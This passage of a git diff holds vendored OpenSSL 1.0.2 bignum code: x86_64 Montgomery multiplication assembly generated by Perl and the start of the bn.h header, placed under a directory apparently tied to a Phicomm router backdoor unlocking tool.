+	mov	%rbx,24($tptr)
+
+	mulx	%rdx,%rax,%rbx
+	 adox	$A1[0],$A1[0]
+	adcx	$A0[0],%rax
+	 mov	24($aptr,$i),%rdx	# a[i+3]	# prefetch
+	 lea	32($i),$i
+	 mov	64($tptr),$A0[0]	# t[2*i+8]	# prefetch
+	 adox	$A1[1],$A1[1]
+	adcx	$A0[1],%rbx
+	 mov	72($tptr),$A0[1]	# t[2*i+8+1]	# prefetch
+	mov	%rax,32($tptr)
+	mov	%rbx,40($tptr)
+
+	mulx	%rdx,%rax,%rbx
+	 adox	$A0[0],$A0[0]
+	adcx	$A1[0],%rax
+	jrcxz	.Lsqrx4x_shift_n_add_break
+	 .byte	0x48,0x8b,0x94,0x0e,0x00,0x00,0x00,0x00	# mov	0($aptr,$i),%rdx	# a[i+4]	# prefetch
+	 adox	$A0[1],$A0[1]
+	adcx	$A1[1],%rbx
+	 mov	80($tptr),$A1[0]	# t[2*i+10]	# prefetch
+	 mov	88($tptr),$A1[1]	# t[2*i+10+1]	# prefetch
+	mov	%rax,48($tptr)
+	mov	%rbx,56($tptr)
+	lea	64($tptr),$tptr
+	nop
+	jmp	.Lsqrx4x_shift_n_add
+
+.align	32
+.Lsqrx4x_shift_n_add_break:
+	adcx	$A1[1],%rbx
+	mov	%rax,48($tptr)
+	mov	%rbx,56($tptr)
+	lea	64($tptr),$tptr		# end of t[] buffer
+___
+}
+######################################################################
+# Montgomery reduction part, "word-by-word" algorithm.
+#
+# This new path is inspired by multiple submissions from Intel, by
+# Shay Gueron, Vlad Krasnov, Erdinc Ozturk, James Guilford,
+# Vinodh Gopal...
+{
+my ($nptr,$carry,$m0)=("%rbp","%rsi","%rdx");
+
+$code.=<<___;
+	movq	%xmm2,$nptr
+sqrx8x_reduction:
+	xor	%eax,%eax		# initial top-most carry bit
+	mov	32+8(%rsp),%rbx		# n0
+	mov	48+8(%rsp),%rdx		# "%r8", 8*0($tptr)
+	lea	-128($nptr,$num,2),%rcx	# end of n[]
+	#lea	48+8(%rsp,$num,2),$tptr	# end of t[] buffer
+	mov	%rcx, 0+8(%rsp)		# save end of n[]
+	mov	$tptr,8+8(%rsp)		# save end of t[]
+
+	lea	48+8(%rsp),$tptr		# initial t[] window
+	jmp	.Lsqrx8x_reduction_loop
+
+.align	32
+.Lsqrx8x_reduction_loop:
+	mov	8*1($tptr),%r9
+	mov	8*2($tptr),%r10
+	mov	8*3($tptr),%r11
+	mov	8*4($tptr),%r12
+	mov	%rdx,%r8
+	imulq	%rbx,%rdx		# n0*a[i]
+	mov	8*5($tptr),%r13
+	mov	8*6($tptr),%r14
+	mov	8*7($tptr),%r15
+	mov	%rax,24+8(%rsp)		# store top-most carry bit
+
+	lea	8*8($tptr),$tptr
+	xor	$carry,$carry		# cf=0,of=0
+	mov	\$-8,%rcx
+	jmp	.Lsqrx8x_reduce
+
+.align	32
+.Lsqrx8x_reduce:
+	mov	%r8, %rbx
+	mulx	16*0($nptr),%rax,%r8	# n[0]
+	adcx	%rbx,%rax		# discarded
+	adox	%r9,%r8
+
+	mulx	16*1($nptr),%rbx,%r9	# n[1]
+	adcx	%rbx,%r8
+	adox	%r10,%r9
+
+	mulx	16*2($nptr),%rbx,%r10
+	adcx	%rbx,%r9
+	adox	%r11,%r10
+
+	mulx	16*3($nptr),%rbx,%r11
+	adcx	%rbx,%r10
+	adox	%r12,%r11
+
+	.byte	0xc4,0x62,0xe3,0xf6,0xa5,0x40,0x00,0x00,0x00	# mulx	16*4($nptr),%rbx,%r12
+	 mov	%rdx,%rax
+	 mov	%r8,%rdx
+	adcx	%rbx,%r11
+	adox	%r13,%r12
+
+	 mulx	32+8(%rsp),%rbx,%rdx	# %rdx discarded
+	 mov	%rax,%rdx
+	 mov	%rax,64+48+8(%rsp,%rcx,8)	# put aside n0*a[i]
+
+	mulx	16*5($nptr),%rax,%r13
+	adcx	%rax,%r12
+	adox	%r14,%r13
+
+	mulx	16*6($nptr),%rax,%r14
+	adcx	%rax,%r13
+	adox	%r15,%r14
+
+	mulx	16*7($nptr),%rax,%r15
+	 mov	%rbx,%rdx
+	adcx	%rax,%r14
+	adox	$carry,%r15		# $carry is 0
+	adcx	$carry,%r15		# cf=0
+
+	.byte	0x67,0x67,0x67
+	inc	%rcx			# of=0
+	jnz	.Lsqrx8x_reduce
+
+	mov	$carry,%rax		# xor	%rax,%rax
+	cmp	0+8(%rsp),$nptr		# end of n[]?
+	jae	.Lsqrx8x_no_tail
+
+	mov	48+8(%rsp),%rdx		# pull n0*a[0]
+	add	8*0($tptr),%r8
+	lea	16*8($nptr),$nptr
+	mov	\$-8,%rcx
+	adcx	8*1($tptr),%r9
+	adcx	8*2($tptr),%r10
+	adc	8*3($tptr),%r11
+	adc	8*4($tptr),%r12
+	adc	8*5($tptr),%r13
+	adc	8*6($tptr),%r14
+	adc	8*7($tptr),%r15
+	lea	8*8($tptr),$tptr
+	sbb	%rax,%rax		# top carry
+
+	xor	$carry,$carry		# of=0, cf=0
+	mov	%rax,16+8(%rsp)
+	jmp	.Lsqrx8x_tail
+
+.align	32
+.Lsqrx8x_tail:
+	mov	%r8,%rbx
+	mulx	16*0($nptr),%rax,%r8
+	adcx	%rax,%rbx
+	adox	%r9,%r8
+
+	mulx	16*1($nptr),%rax,%r9
+	adcx	%rax,%r8
+	adox	%r10,%r9
+
+	mulx	16*2($nptr),%rax,%r10
+	adcx	%rax,%r9
+	adox	%r11,%r10
+
+	mulx	16*3($nptr),%rax,%r11
+	adcx	%rax,%r10
+	adox	%r12,%r11
+
+	.byte	0xc4,0x62,0xfb,0xf6,0xa5,0x40,0x00,0x00,0x00	# mulx	16*4($nptr),%rax,%r12
+	adcx	%rax,%r11
+	adox	%r13,%r12
+
+	mulx	16*5($nptr),%rax,%r13
+	adcx	%rax,%r12
+	adox	%r14,%r13
+
+	mulx	16*6($nptr),%rax,%r14
+	adcx	%rax,%r13
+	adox	%r15,%r14
+
+	mulx	16*7($nptr),%rax,%r15
+	 mov	72+48+8(%rsp,%rcx,8),%rdx	# pull n0*a[i]
+	adcx	%rax,%r14
+	adox	$carry,%r15
+	 mov	%rbx,($tptr,%rcx,8)	# save result
+	 mov	%r8,%rbx
+	adcx	$carry,%r15		# cf=0
+
+	inc	%rcx			# of=0
+	jnz	.Lsqrx8x_tail
+
+	cmp	0+8(%rsp),$nptr		# end of n[]?
+	jae	.Lsqrx8x_tail_done	# break out of loop
+
+	sub	16+8(%rsp),$carry	# mov 16(%rsp),%cf
+	 mov	48+8(%rsp),%rdx		# pull n0*a[0]
+	 lea	16*8($nptr),$nptr
+	adc	8*0($tptr),%r8
+	adc	8*1($tptr),%r9
+	adc	8*2($tptr),%r10
+	adc	8*3($tptr),%r11
+	adc	8*4($tptr),%r12
+	adc	8*5($tptr),%r13
+	adc	8*6($tptr),%r14
+	adc	8*7($tptr),%r15
+	lea	8*8($tptr),$tptr
+	sbb	%rax,%rax
+	sub	\$8,%rcx		# mov	\$-8,%rcx
+
+	xor	$carry,$carry		# of=0, cf=0
+	mov	%rax,16+8(%rsp)
+	jmp	.Lsqrx8x_tail
+
+.align	32
+.Lsqrx8x_tail_done:
+	add	24+8(%rsp),%r8		# can this overflow?
+	mov	$carry,%rax		# xor	%rax,%rax
+
+	sub	16+8(%rsp),$carry	# mov 16(%rsp),%cf
+.Lsqrx8x_no_tail:			# %cf is 0 if jumped here
+	adc	8*0($tptr),%r8
+	 movq	%xmm3,%rcx
+	adc	8*1($tptr),%r9
+	 mov	16*7($nptr),$carry
+	 movq	%xmm2,$nptr		# restore $nptr
+	adc	8*2($tptr),%r10
+	adc	8*3($tptr),%r11
+	adc	8*4($tptr),%r12
+	adc	8*5($tptr),%r13
+	adc	8*6($tptr),%r14
+	adc	8*7($tptr),%r15
+	adc	%rax,%rax		# top-most carry
+
+	mov	32+8(%rsp),%rbx		# n0
+	mov	8*8($tptr,%rcx),%rdx	# modulo-scheduled "%r8"
+
+	mov	%r8,8*0($tptr)		# store top 512 bits
+	 lea	8*8($tptr),%r8		# borrow %r8
+	mov	%r9,8*1($tptr)
+	mov	%r10,8*2($tptr)
+	mov	%r11,8*3($tptr)
+	mov	%r12,8*4($tptr)
+	mov	%r13,8*5($tptr)
+	mov	%r14,8*6($tptr)
+	mov	%r15,8*7($tptr)
+
+	lea	8*8($tptr,%rcx),$tptr	# start of current t[] window
+	cmp	8+8(%rsp),%r8		# end of t[]?
+	jb	.Lsqrx8x_reduction_loop
+___
+}
+##############################################################
+# Post-condition, 4x unrolled
+#
+{
+my ($rptr,$nptr)=("%rdx","%rbp");
+my @ri=map("%r$_",(10..13));
+my @ni=map("%r$_",(14..15));
+$code.=<<___;
+	xor	%rbx,%rbx
+	sub	%r15,%rsi		# compare top-most words
+	adc	%rbx,%rbx
+	mov	%rcx,%r10		# -$num
+	.byte	0x67
+	or	%rbx,%rax
+	.byte	0x67
+	mov	%rcx,%r9		# -$num
+	xor	\$1,%rax
+	sar	\$3+2,%rcx		# cf=0
+	#lea	48+8(%rsp,%r9),$tptr
+	lea	($nptr,%rax,8),$nptr
+	movq	%xmm1,$rptr		# restore $rptr
+	movq	%xmm1,$aptr		# prepare for back-to-back call
+	jmp	.Lsqrx4x_sub
+
+.align	32
+.Lsqrx4x_sub:
+	.byte	0x66
+	mov	8*0($tptr),%r12
+	mov	8*1($tptr),%r13
+	sbb	16*0($nptr),%r12
+	mov	8*2($tptr),%r14
+	sbb	16*1($nptr),%r13
+	mov	8*3($tptr),%r15
+	lea	8*4($tptr),$tptr
+	sbb	16*2($nptr),%r14
+	mov	%r12,8*0($rptr)
+	sbb	16*3($nptr),%r15
+	lea	16*4($nptr),$nptr
+	mov	%r13,8*1($rptr)
+	mov	%r14,8*2($rptr)
+	mov	%r15,8*3($rptr)
+	lea	8*4($rptr),$rptr
+
+	inc	%rcx
+	jnz	.Lsqrx4x_sub
+___
+}
+$code.=<<___;
+	neg	%r9			# restore $num
+
+	ret
+.size	bn_sqrx8x_internal,.-bn_sqrx8x_internal
+___
+}}}
+{
+my ($inp,$num,$tbl,$idx)=$win64?("%rcx","%edx","%r8", "%r9d") : # Win64 order
+				("%rdi","%esi","%rdx","%ecx");  # Unix order
+my $out=$inp;
+my $STRIDE=2**5*8;
+my $N=$STRIDE/4;
+
+$code.=<<___;
+.globl	bn_get_bits5
+.type	bn_get_bits5,\@abi-omnipotent
+.align	16
+bn_get_bits5:
+	mov	$inp,%r10
+	mov	$num,%ecx
+	shr	\$3,$num
+	movzw	(%r10,$num),%eax
+	and	\$7,%ecx
+	shrl	%cl,%eax
+	and	\$31,%eax
+	ret
+.size	bn_get_bits5,.-bn_get_bits5
+
+.globl	bn_scatter5
+.type	bn_scatter5,\@abi-omnipotent
+.align	16
+bn_scatter5:
+	cmp	\$0, $num
+	jz	.Lscatter_epilogue
+	lea	($tbl,$idx,8),$tbl
+.Lscatter:
+	mov	($inp),%rax
+	lea	8($inp),$inp
+	mov	%rax,($tbl)
+	lea	32*8($tbl),$tbl
+	sub	\$1,$num
+	jnz	.Lscatter
+.Lscatter_epilogue:
+	ret
+.size	bn_scatter5,.-bn_scatter5
+
+.globl	bn_gather5
+.type	bn_gather5,\@abi-omnipotent
+.align	16
+bn_gather5:
+___
+$code.=<<___ if ($win64);
+.LSEH_begin_bn_gather5:
+	# I can't trust assembler to use specific encoding:-(
+	.byte	0x48,0x83,0xec,0x28		#sub	\$0x28,%rsp
+	.byte	0x0f,0x29,0x34,0x24		#movaps	%xmm6,(%rsp)
+	.byte	0x0f,0x29,0x7c,0x24,0x10	#movdqa	%xmm7,0x10(%rsp)
+___
+$code.=<<___;
+	mov	$idx,%r11d
+	shr	\$`log($N/8)/log(2)`,$idx
+	and	\$`$N/8-1`,%r11
+	not	$idx
+	lea	.Lmagic_masks(%rip),%rax
+	and	\$`2**5/($N/8)-1`,$idx	# 5 is "window size"
+	lea	128($tbl,%r11,8),$tbl	# pointer within 1st cache line
+	movq	0(%rax,$idx,8),%xmm4	# set of masks denoting which
+	movq	8(%rax,$idx,8),%xmm5	# cache line contains element
+	movq	16(%rax,$idx,8),%xmm6	# denoted by 7th argument
+	movq	24(%rax,$idx,8),%xmm7
+	jmp	.Lgather
+.align	16
+.Lgather:
+	movq	`0*$STRIDE/4-128`($tbl),%xmm0
+	movq	`1*$STRIDE/4-128`($tbl),%xmm1
+	pand	%xmm4,%xmm0
+	movq	`2*$STRIDE/4-128`($tbl),%xmm2
+	pand	%xmm5,%xmm1
+	movq	`3*$STRIDE/4-128`($tbl),%xmm3
+	pand	%xmm6,%xmm2
+	por	%xmm1,%xmm0
+	pand	%xmm7,%xmm3
+	.byte	0x67,0x67
+	por	%xmm2,%xmm0
+	lea	$STRIDE($tbl),$tbl
+	por	%xmm3,%xmm0
+
+	movq	%xmm0,($out)		# m0=bp[0]
+	lea	8($out),$out
+	sub	\$1,$num
+	jnz	.Lgather
+___
+$code.=<<___ if ($win64);
+	movaps	(%rsp),%xmm6
+	movaps	0x10(%rsp),%xmm7
+	lea	0x28(%rsp),%rsp
+___
+$code.=<<___;
+	ret
+.LSEH_end_bn_gather5:
+.size	bn_gather5,.-bn_gather5
+___
+}
+$code.=<<___;
+.align	64
+.Lmagic_masks:
+	.long	0,0, 0,0, 0,0, -1,-1
+	.long	0,0, 0,0, 0,0,  0,0
+.asciz	"Montgomery Multiplication with scatter/gather for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	mul_handler,\@abi-omnipotent
+.align	16
+mul_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# end of prologue label
+	cmp	%r10,%rbx		# context->Rip<end of prologue label
+	jb	.Lcommon_seh_tail
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lcommon_seh_tail
+
+	lea	.Lmul_epilogue(%rip),%r10
+	cmp	%r10,%rbx
+	jb	.Lbody_40
+
+	mov	192($context),%r10	# pull $num
+	mov	8(%rax,%r10,8),%rax	# pull saved stack pointer
+	jmp	.Lbody_proceed
+
+.Lbody_40:
+	mov	40(%rax),%rax		# pull saved stack pointer
+.Lbody_proceed:
+
+	movaps	-88(%rax),%xmm0
+	movaps	-72(%rax),%xmm1
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	-48(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+	movups	%xmm0,512($context)	# restore context->Xmm6
+	movups	%xmm1,528($context)	# restore context->Xmm7
+
+.Lcommon_seh_tail:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	mul_handler,.-mul_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_bn_mul_mont_gather5
+	.rva	.LSEH_end_bn_mul_mont_gather5
+	.rva	.LSEH_info_bn_mul_mont_gather5
+
+	.rva	.LSEH_begin_bn_mul4x_mont_gather5
+	.rva	.LSEH_end_bn_mul4x_mont_gather5
+	.rva	.LSEH_info_bn_mul4x_mont_gather5
+
+	.rva	.LSEH_begin_bn_power5
+	.rva	.LSEH_end_bn_power5
+	.rva	.LSEH_info_bn_power5
+
+	.rva	.LSEH_begin_bn_from_mont8x
+	.rva	.LSEH_end_bn_from_mont8x
+	.rva	.LSEH_info_bn_from_mont8x
+___
+$code.=<<___ if ($addx);
+	.rva	.LSEH_begin_bn_mulx4x_mont_gather5
+	.rva	.LSEH_end_bn_mulx4x_mont_gather5
+	.rva	.LSEH_info_bn_mulx4x_mont_gather5
+
+	.rva	.LSEH_begin_bn_powerx5
+	.rva	.LSEH_end_bn_powerx5
+	.rva	.LSEH_info_bn_powerx5
+___
+$code.=<<___;
+	.rva	.LSEH_begin_bn_gather5
+	.rva	.LSEH_end_bn_gather5
+	.rva	.LSEH_info_bn_gather5
+
+.section	.xdata
+.align	8
+.LSEH_info_bn_mul_mont_gather5:
+	.byte	9,0,0,0
+	.rva	mul_handler
+	.rva	.Lmul_body,.Lmul_epilogue		# HandlerData[]
+.align	8
+.LSEH_info_bn_mul4x_mont_gather5:
+	.byte	9,0,0,0
+	.rva	mul_handler
+	.rva	.Lmul4x_body,.Lmul4x_epilogue		# HandlerData[]
+.align	8
+.LSEH_info_bn_power5:
+	.byte	9,0,0,0
+	.rva	mul_handler
+	.rva	.Lpower5_body,.Lpower5_epilogue		# HandlerData[]
+.align	8
+.LSEH_info_bn_from_mont8x:
+	.byte	9,0,0,0
+	.rva	mul_handler
+	.rva	.Lfrom_body,.Lfrom_epilogue		# HandlerData[]
+___
+$code.=<<___ if ($addx);
+.align	8
+.LSEH_info_bn_mulx4x_mont_gather5:
+	.byte	9,0,0,0
+	.rva	mul_handler
+	.rva	.Lmulx4x_body,.Lmulx4x_epilogue		# HandlerData[]
+.align	8
+.LSEH_info_bn_powerx5:
+	.byte	9,0,0,0
+	.rva	mul_handler
+	.rva	.Lpowerx5_body,.Lpowerx5_epilogue	# HandlerData[]
+___
+$code.=<<___;
+.align	8
+.LSEH_info_bn_gather5:
+        .byte   0x01,0x0d,0x05,0x00
+        .byte   0x0d,0x78,0x01,0x00	#movaps	0x10(rsp),xmm7
+        .byte   0x08,0x68,0x00,0x00	#movaps	(rsp),xmm6
+        .byte   0x04,0x42,0x00,0x00	#sub	rsp,0x28
+.align	8
+___
+}
+
+$code =~ s/\`([^\`]*)\`/eval($1)/gem;
+
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn.h
new file mode 100644
index 0000000..78709d3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn.h
@@ -0,0 +1,934 @@
+/* crypto/bn/bn.h */
+/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * Portions of the attached software ("Contribution") are developed by
+ * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
+ *
+ * The Contribution is licensed pursuant to the Eric Young open source
+ * license provided above.
+ *
+ * The binary polynomial arithmetic software is originally written by
+ * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories.
+ *
+ */
+
+#ifndef HEADER_BN_H
+# define HEADER_BN_H
+
+# include <openssl/e_os2.h>
+# ifndef OPENSSL_NO_FP_API
+#  include <stdio.h>            /* FILE */
+# endif
+# include <openssl/ossl_typ.h>
+# include <openssl/crypto.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/*
+ * These preprocessor symbols control various aspects of the bignum headers
+ * and library code. They're not defined by any "normal" configuration, as
+ * they are intended for development and testing purposes. NB: defining all
+ * three can be useful for debugging application code as well as openssl
+ * itself. BN_DEBUG - turn on various debugging alterations to the bignum
+ * code BN_DEBUG_RAND - uses random poisoning of unused words to trip up
+ * mismanagement of bignum internals. You must also define BN_DEBUG.
+ */
+/* #define BN_DEBUG */
+/* #define BN_DEBUG_RAND */
+
+# ifndef OPENSSL_SMALL_FOOTPRINT
+#  define BN_MUL_COMBA
+#  define BN_SQR_COMBA
+#  define BN_RECURSION
+# endif
+
+/*
+ * This next option uses the C libraries (2 word)/(1 word) function. If it is
+ * not defined, I use my C version (which is slower). The reason for this
+ * flag is that when the particular C compiler library routine is used, and
+ * the library is linked with a different compiler, the library is missing.
+ * This mostly happens when the library is built with gcc and then linked
+ * using normal cc.  This would be a common occurrence because gcc normally
+ * produces code that is 2 times faster than system compilers for the big
+ * number stuff. For machines with only one compiler (or shared libraries),
+ * this should be on.  Again this in only really a problem on machines using
+ * "long long's", are 32bit, and are not using my assembler code.
+ */
+# if defined(OPENSSL_SYS_MSDOS) || defined(OPENSSL_SYS_WINDOWS) || \
+    defined(OPENSSL_SYS_WIN32) || defined(linux)
+#  ifndef BN_DIV2W
+#   define BN_DIV2W
+#  endif
+# endif
+
+/*
+ * assuming long is 64bit - this is the DEC Alpha unsigned long long is only
+ * 64 bits :-(, don't define BN_LLONG for the DEC Alpha
+ */
+# ifdef SIXTY_FOUR_BIT_LONG
+#  define BN_ULLONG       unsigned long long
+#  define BN_ULONG        unsigned long
+#  define BN_LONG         long
+#  define BN_BITS         128
+#  define BN_BYTES        8
+#  define BN_BITS2        64
+#  define BN_BITS4        32
+#  define BN_MASK         (0xffffffffffffffffffffffffffffffffLL)
+#  define BN_MASK2        (0xffffffffffffffffL)
+#  define BN_MASK2l       (0xffffffffL)
+#  define BN_MASK2h       (0xffffffff00000000L)
+#  define BN_MASK2h1      (0xffffffff80000000L)
+#  define BN_TBIT         (0x8000000000000000L)
+#  define BN_DEC_CONV     (10000000000000000000UL)
+#  define BN_DEC_FMT1     "%lu"
+#  define BN_DEC_FMT2     "%019lu"
+#  define BN_DEC_NUM      19
+#  define BN_HEX_FMT1     "%lX"
+#  define BN_HEX_FMT2     "%016lX"
+# endif
+
+/*
+ * This is where the long long data type is 64 bits, but long is 32. For
+ * machines where there are 64bit registers, this is the mode to use. IRIX,
+ * on R4000 and above should use this mode, along with the relevant assembler
+ * code :-).  Do NOT define BN_LLONG.
+ */
+# ifdef SIXTY_FOUR_BIT
+#  undef BN_LLONG
+#  undef BN_ULLONG
+#  define BN_ULONG        unsigned long long
+#  define BN_LONG         long long
+#  define BN_BITS         128
+#  define BN_BYTES        8
+#  define BN_BITS2        64
+#  define BN_BITS4        32
+#  define BN_MASK2        (0xffffffffffffffffLL)
+#  define BN_MASK2l       (0xffffffffL)
+#  define BN_MASK2h       (0xffffffff00000000LL)
+#  define BN_MASK2h1      (0xffffffff80000000LL)
+#  define BN_TBIT         (0x8000000000000000LL)
+#  define BN_DEC_CONV     (10000000000000000000ULL)
+#  define BN_DEC_FMT1     "%llu"
+#  define BN_DEC_FMT2     "%019llu"
+#  define BN_DEC_NUM      19
+#  define BN_HEX_FMT1     "%llX"
+#  define BN_HEX_FMT2     "%016llX"
+# endif
+
+# ifdef THIRTY_TWO_BIT
